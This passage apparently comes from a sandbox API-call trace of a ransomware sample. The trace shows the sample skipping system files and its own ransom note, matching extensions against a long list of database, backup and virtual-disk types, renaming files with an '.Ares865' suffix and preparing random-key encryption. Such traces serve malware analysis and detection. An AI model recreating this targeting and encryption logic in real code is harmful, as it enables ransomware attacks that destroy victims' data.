lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.939] lstrlenW (lpString="p96") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.939] lstrlenW (lpString="p97") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.939] lstrlenW (lpString="pan") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.939] lstrlenW (lpString="pdb") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.940] lstrlenW (lpString="pdm") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.940] lstrlenW (lpString="pnz") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.940] lstrlenW (lpString="qry") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.940] lstrlenW (lpString="qvd") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.940] lstrlenW (lpString="rbf") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.940] lstrlenW (lpString="rctd") returned 4 [0084.940] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.940] lstrlenW (lpString="rod") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.940] lstrlenW (lpString="rodx") returned 4 [0084.940] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.940] lstrlenW (lpString="rpd") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.940] lstrlenW (lpString="rsd") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.940] lstrlenW (lpString="sas7bdat") returned 8 [0084.940] lstrcmpiW (lpString1="le24.bmp", lpString2="sas7bdat") returned -1 [0084.940] lstrlenW (lpString="sbf") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.940] lstrlenW (lpString="scx") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.940] lstrlenW (lpString="sdb") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.940] lstrlenW (lpString="sdc") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.940] lstrlenW (lpString="sdf") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.940] lstrlenW (lpString="sis") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.940] lstrlenW (lpString="spq") returned 3 [0084.940] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.940] lstrlenW (lpString="te") returned 2 [0084.940] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.941] lstrlenW (lpString="teacher") returned 7 [0084.941] lstrcmpiW (lpString1="e24.bmp", lpString2="teacher") returned -1 [0084.941] lstrlenW (lpString="tmd") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.941] lstrlenW (lpString="tps") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.941] lstrlenW (lpString="trc") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.941] lstrlenW (lpString="trc") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.941] lstrlenW (lpString="trm") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.941] lstrlenW (lpString="udb") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.941] lstrlenW (lpString="udl") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.941] lstrlenW (lpString="usr") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.941] lstrlenW (lpString="v12") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.941] lstrlenW (lpString="vis") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.941] lstrlenW (lpString="vpd") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.941] lstrlenW (lpString="vvv") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.941] lstrlenW (lpString="wdb") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.941] lstrlenW (lpString="wmdb") returned 4 [0084.941] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.941] lstrlenW (lpString="wrk") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.941] lstrlenW (lpString="xdb") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.941] lstrlenW (lpString="xld") returned 3 [0084.941] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.941] lstrlenW (lpString="xmlff") returned 5 [0084.941] lstrcmpiW (lpString1="4.bmp", lpString2="xmlff") returned -1 [0084.942] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.Ares865") returned 90 [0084.942] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp.ares865"), dwFlags=0x1) returned 1 [0084.945] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.945] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.945] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.946] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.946] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.946] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.948] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.953] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.954] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.954] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0084.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0084.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.955] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.955] CloseHandle (hObject=0x15c) returned 1 [0084.955] CloseHandle (hObject=0x118) returned 1 [0084.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.956] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd259105, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="aoldtz.exe") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2=".") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="..") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="windows") returned -1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="bootmgr") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="temp") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="pagefile.sys") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="boot") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="ids.txt") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="ntuser.dat") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="perflogs") returned 1 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2="MSBuild") returned 1 [0084.956] lstrlenW (lpString="usertile25.bmp") returned 14 [0084.956] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned 82 [0084.956] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile25.bmp" | out: lpString1="usertile25.bmp") returned="usertile25.bmp" [0084.956] lstrlenW (lpString="usertile25.bmp") returned 14 [0084.956] lstrlenW (lpString="Ares865") returned 7 [0084.956] lstrcmpiW (lpString1="e25.bmp", lpString2="Ares865") returned 1 [0084.956] lstrlenW (lpString=".dll") returned 4 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2=".dll") returned 1 [0084.956] lstrlenW (lpString=".lnk") returned 4 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2=".lnk") returned 1 [0084.956] lstrlenW (lpString=".ini") returned 4 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2=".ini") returned 1 [0084.956] lstrlenW (lpString=".sys") returned 4 [0084.956] lstrcmpiW (lpString1="usertile25.bmp", lpString2=".sys") returned 1 [0084.956] lstrlenW (lpString="usertile25.bmp") returned 14 [0084.956] lstrlenW (lpString="bak") returned 3 [0084.956] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.956] lstrlenW (lpString="ba_") returned 3 [0084.956] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.956] lstrlenW (lpString="dbb") returned 3 [0084.956] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.957] lstrlenW (lpString="vmdk") returned 4 [0084.957] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.957] lstrlenW (lpString="rar") returned 3 [0084.957] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.957] lstrlenW (lpString="zip") returned 3 [0084.957] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.957] lstrlenW (lpString="tgz") returned 3 [0084.957] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.957] lstrlenW (lpString="vbox") returned 4 [0084.957] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.957] lstrlenW (lpString="vdi") returned 3 [0084.957] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.957] lstrlenW (lpString="vhd") returned 3 [0084.957] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.957] lstrlenW (lpString="vhdx") returned 4 [0084.958] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.958] lstrlenW (lpString="avhd") returned 4 [0084.958] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.958] lstrlenW (lpString="db") returned 2 [0084.958] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.958] lstrlenW (lpString="db2") returned 3 [0084.958] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.958] lstrlenW (lpString="db3") returned 3 [0084.958] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.958] lstrlenW (lpString="dbf") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.959] lstrlenW (lpString="mdf") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.959] lstrlenW (lpString="mdb") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.959] lstrlenW (lpString="sql") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.959] lstrlenW (lpString="sqlite") returned 6 [0084.959] lstrcmpiW (lpString1="25.bmp", lpString2="sqlite") returned -1 [0084.959] lstrlenW (lpString="sqlite3") returned 7 [0084.959] lstrcmpiW (lpString1="e25.bmp", lpString2="sqlite3") returned -1 [0084.959] lstrlenW (lpString="sqlitedb") returned 8 [0084.959] lstrcmpiW (lpString1="le25.bmp", lpString2="sqlitedb") returned -1 [0084.959] lstrlenW (lpString="xml") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.959] lstrlenW (lpString="$er") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.959] lstrlenW (lpString="4dd") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.959] lstrlenW (lpString="4dl") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.959] lstrlenW (lpString="^^^") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.959] lstrlenW (lpString="abs") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.959] lstrlenW (lpString="abx") returned 3 [0084.959] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.959] lstrlenW (lpString="accdb") returned 5 [0084.959] lstrcmpiW (lpString1="5.bmp", lpString2="accdb") returned -1 [0084.959] lstrlenW (lpString="accdc") returned 5 [0084.959] lstrcmpiW (lpString1="5.bmp", lpString2="accdc") returned -1 [0084.959] lstrlenW (lpString="accde") returned 5 [0084.959] lstrcmpiW (lpString1="5.bmp", lpString2="accde") returned -1 [0084.959] lstrlenW (lpString="accdr") returned 5 [0084.959] lstrcmpiW (lpString1="5.bmp", lpString2="accdr") returned -1 [0084.959] lstrlenW (lpString="accdt") returned 5 [0084.960] lstrcmpiW (lpString1="5.bmp", lpString2="accdt") returned -1 [0084.960] lstrlenW (lpString="accdw") returned 5 [0084.960] lstrcmpiW (lpString1="5.bmp", lpString2="accdw") returned -1 [0084.960] lstrlenW (lpString="accft") returned 5 [0084.960] lstrcmpiW (lpString1="5.bmp", lpString2="accft") returned -1 [0084.960] lstrlenW (lpString="adb") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.960] lstrlenW (lpString="adb") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.960] lstrlenW (lpString="ade") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.960] lstrlenW (lpString="adf") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.960] lstrlenW (lpString="adn") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.960] lstrlenW (lpString="adp") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.960] lstrlenW (lpString="alf") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.960] lstrlenW (lpString="ask") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.960] lstrlenW (lpString="btr") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.960] lstrlenW (lpString="cat") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.960] lstrlenW (lpString="cdb") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.960] lstrlenW (lpString="ckp") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.960] lstrlenW (lpString="cma") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.960] lstrlenW (lpString="cpd") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.960] lstrlenW (lpString="dacpac") returned 6 [0084.960] lstrcmpiW (lpString1="25.bmp", lpString2="dacpac") returned -1 [0084.960] lstrlenW (lpString="dad") returned 3 [0084.960] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.960] lstrlenW (lpString="dadiagrams") returned 10 [0084.961] lstrcmpiW (lpString1="tile25.bmp", lpString2="dadiagrams") returned 1 [0084.961] lstrlenW (lpString="daschema") returned 8 [0084.961] lstrcmpiW (lpString1="le25.bmp", lpString2="daschema") returned 1 [0084.961] lstrlenW (lpString="db-journal") returned 10 [0084.961] lstrcmpiW (lpString1="tile25.bmp", lpString2="db-journal") returned 1 [0084.961] lstrlenW (lpString="db-shm") returned 6 [0084.961] lstrcmpiW (lpString1="25.bmp", lpString2="db-shm") returned -1 [0084.961] lstrlenW (lpString="db-wal") returned 6 [0084.961] lstrcmpiW (lpString1="25.bmp", lpString2="db-wal") returned -1 [0084.961] lstrlenW (lpString="dbc") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.961] lstrlenW (lpString="dbs") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.961] lstrlenW (lpString="dbt") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.961] lstrlenW (lpString="dbv") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.961] lstrlenW (lpString="dbx") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.961] lstrlenW (lpString="dcb") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.961] lstrlenW (lpString="dct") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.961] lstrlenW (lpString="dcx") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.961] lstrlenW (lpString="ddl") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.961] lstrlenW (lpString="dlis") returned 4 [0084.961] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.961] lstrlenW (lpString="dp1") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.961] lstrlenW (lpString="dqy") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.961] lstrlenW (lpString="dsk") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.961] lstrlenW (lpString="dsn") returned 3 [0084.961] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.961] lstrlenW (lpString="dtsx") returned 4 [0084.962] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.962] lstrlenW (lpString="dxl") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.962] lstrlenW (lpString="eco") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.962] lstrlenW (lpString="ecx") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.962] lstrlenW (lpString="edb") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.962] lstrlenW (lpString="epim") returned 4 [0084.962] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.962] lstrlenW (lpString="fcd") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.962] lstrlenW (lpString="fdb") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.962] lstrlenW (lpString="fic") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.962] lstrlenW (lpString="flexolibrary") returned 12 [0084.962] lstrcmpiW (lpString1="ertile25.bmp", lpString2="flexolibrary") returned -1 [0084.962] lstrlenW (lpString="fm5") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.962] lstrlenW (lpString="fmp") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.962] lstrlenW (lpString="fmp12") returned 5 [0084.962] lstrcmpiW (lpString1="5.bmp", lpString2="fmp12") returned -1 [0084.962] lstrlenW (lpString="fmpsl") returned 5 [0084.962] lstrcmpiW (lpString1="5.bmp", lpString2="fmpsl") returned -1 [0084.962] lstrlenW (lpString="fol") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.962] lstrlenW (lpString="fp3") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.962] lstrlenW (lpString="fp4") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.962] lstrlenW (lpString="fp5") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.962] lstrlenW (lpString="fp7") returned 3 [0084.962] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.963] lstrlenW (lpString="fpt") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.963] lstrlenW (lpString="frm") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.963] lstrlenW (lpString="gdb") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.963] lstrlenW (lpString="gdb") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.963] lstrlenW (lpString="grdb") returned 4 [0084.963] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.963] lstrlenW (lpString="gwi") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.963] lstrlenW (lpString="hdb") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.963] lstrlenW (lpString="his") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.963] lstrlenW (lpString="ib") returned 2 [0084.963] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.963] lstrlenW (lpString="idb") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.963] lstrlenW (lpString="ihx") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.963] lstrlenW (lpString="itdb") returned 4 [0084.963] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.963] lstrlenW (lpString="itw") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.963] lstrlenW (lpString="jet") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.963] lstrlenW (lpString="jtx") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.963] lstrlenW (lpString="kdb") returned 3 [0084.963] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.963] lstrlenW (lpString="kexi") returned 4 [0084.963] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.963] lstrlenW (lpString="kexic") returned 5 [0084.963] lstrcmpiW (lpString1="5.bmp", lpString2="kexic") returned -1 [0084.963] lstrlenW (lpString="kexis") returned 5 [0084.963] lstrcmpiW (lpString1="5.bmp", lpString2="kexis") returned -1 [0084.964] lstrlenW (lpString="lgc") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.964] lstrlenW (lpString="lwx") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.964] lstrlenW (lpString="maf") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.964] lstrlenW (lpString="maq") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.964] lstrlenW (lpString="mar") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.964] lstrlenW (lpString="marshal") returned 7 [0084.964] lstrcmpiW (lpString1="e25.bmp", lpString2="marshal") returned -1 [0084.964] lstrlenW (lpString="mas") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.964] lstrlenW (lpString="mav") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.964] lstrlenW (lpString="maw") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.964] lstrlenW (lpString="mdbhtml") returned 7 [0084.964] lstrcmpiW (lpString1="e25.bmp", lpString2="mdbhtml") returned -1 [0084.964] lstrlenW (lpString="mdn") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.964] lstrlenW (lpString="mdt") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.964] lstrlenW (lpString="mfd") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.964] lstrlenW (lpString="mpd") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.964] lstrlenW (lpString="mrg") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.964] lstrlenW (lpString="mud") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.964] lstrlenW (lpString="mwb") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.964] lstrlenW (lpString="myd") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.964] lstrlenW (lpString="ndf") returned 3 [0084.964] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.965] lstrlenW (lpString="nnt") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.965] lstrlenW (lpString="nrmlib") returned 6 [0084.965] lstrcmpiW (lpString1="25.bmp", lpString2="nrmlib") returned -1 [0084.965] lstrlenW (lpString="ns2") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.965] lstrlenW (lpString="ns3") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", 